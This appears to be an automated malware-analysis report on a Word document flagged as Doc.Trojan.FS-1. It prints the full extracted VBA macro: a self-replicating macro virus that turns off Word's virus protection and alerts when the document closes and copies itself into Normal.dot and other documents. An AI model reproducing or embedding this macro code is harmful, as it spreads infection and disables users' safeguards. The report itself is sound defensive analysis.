MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The file is identified as malicious by ClamAV with the signature Doc.Trojan.FS-1. It contains VBA macros that are designed to execute code upon document closure. The macro attempts to add its own code to the Normal.dot template, potentially for persistence or further execution, though the exact payload is not directly observable.
Heuristics 2
-
ClamAV: Doc.Trojan.FS-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.FS-1
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 966 bytes |
SHA-256: 3ca5c8b50fa7ff849d2a976dafaeb6e33d131526ce1e3d20f706f54e07cf4f9a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Anoia
Private Sub Document_Close()
On Error Resume Next
ι = ActiveDocument.Saved
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Application.DisplayAlerts = 0
Options.ConfirmConversions = 0
Application.EnableCancelKey = 0
If Len(ActiveDocument.Path) Then
Set α = IIf(MacroContainer <> NormalTemplate, NormalTemplate, ActiveDocument).VBProject.VBComponents(1).CodeModule
Set υ = ThisDocument.VBProject.VBComponents(1).CodeModule
If Not α.Find("~^^~", 0, 0, 0, 0) Then α.AddFromString υ.Lines(1, υ.CountOfLines)
If Not ActiveDocument.ReadOnly Then ActiveDocument.Save
End If: ActiveDocument.Saved = ι
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.